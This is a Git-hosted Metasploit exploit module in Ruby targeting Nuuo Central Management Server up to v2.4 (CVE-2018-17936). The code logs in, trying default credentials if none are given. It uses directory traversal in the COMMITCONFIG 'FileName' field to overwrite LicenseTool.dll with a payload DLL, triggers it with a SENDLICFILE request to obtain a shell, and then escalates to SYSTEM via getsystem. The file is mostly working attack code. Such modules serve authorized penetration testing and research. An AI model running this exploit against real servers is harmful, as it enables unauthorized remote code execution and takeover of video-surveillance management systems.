adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/modules/exploits/windows/nuuo/nuuo_cms_fu.rb
T
Adam Cammack cf9b94a964 Set needs_cleanup flag for exploits that need it 
The `needs_cleanup` flag needs to be set per-module when an exploit
needs an interactive session to clean up. Some `FileDropper` exploits
need additional cleanup to what the mixin provides, but since all
`FileDropper`s already mark themselves as needing cleanup those are not
covered here. A few of these could potentially be refactored to use the
original exploitation method to clean up or to compile the list of
files/commands to clean up ahead of time, but that is out of the scope
of this fix.
2019-08-02 10:23:53 -05:00

125 lines
4.4 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::Nuuo
def initialize(info={})
super(update_info(info,
'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
'Description' => %q{
The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
CMS Server.
The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\)
characters. Therefore, this function can be abused to overwrite any files in the installation
drive of CMS Server.
This vulnerability is exploitable in CMS versions up to and including v2.4.
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
not execute successfully.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'CVE', '2018-17936' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Nuuo Central Management Server <= v2.4.0', {} ],
],
'Privileged' => true,
'DisclosureDate' => 'Oct 11 2018',
'DefaultTarget' => 0))
self.needs_cleanup = true
end
def on_new_session(client)
if client.type == 'meterpreter'
print_warning('Please wait a bit while we clean up')
client.sys.process.get_processes().each do |proc|
if proc['name'] == 'NCS_Server.exe'
client.sys.process.kill(proc['pid'])
Rex.sleep(5)
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
client.sys.process.execute('NCS_Server.exe')
print_good('Successfully restored LicenseTool.dll!')
end
end
# elevate privs to system (we're already Admin anyway), and we're done!
client.run_cmd('getsystem')
print_good('We should have SYSTEM now, enjoy your shell!')
else
print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
print_error('... otherwise the Nuuo CMS installation will be nuked!')
print_good('Anyway, enjoy your shell!')
end
end
def upload_file(filename, data)
res = ncs_send_request({
'method' => 'COMMITCONFIG',
'file_name' => "..\\..\\#{filename}",
'user_session' => user_session,
'data' => data
})
end
def exploit
connect
res = ncs_login
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') unless res
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
# and not nuke the CMS installation.
@dll = rand_text_alpha(12)
print_status("Backing up LicenseTool.dll to #{@dll}")
ltool = 'LicenseTool.dll'
res = ncs_send_request({
'method' => 'GETCONFIG',
'file_name' => "..\\..\\#{ltool}",
'user_session' => user_session
})
dll_data = res.body
upload_file(@dll, dll_data)
print_status('Uploading payload...')
upload_file(ltool, generate_payload_dll)
print_status('Sleeping 15 seconds...')
Rex.sleep(15)
print_status('Sending SENDLICFILE request, shell incoming!')
res = ncs_send_request({
'method' => 'SENDLICFILE',
'file_name' => "#{rand_text_alpha(3..11)}.lic",
'user_session' => user_session,
'data' => rand_text_alpha(50..350)
})
end
end
Reference in New Issue View Git Blame Copy Permalink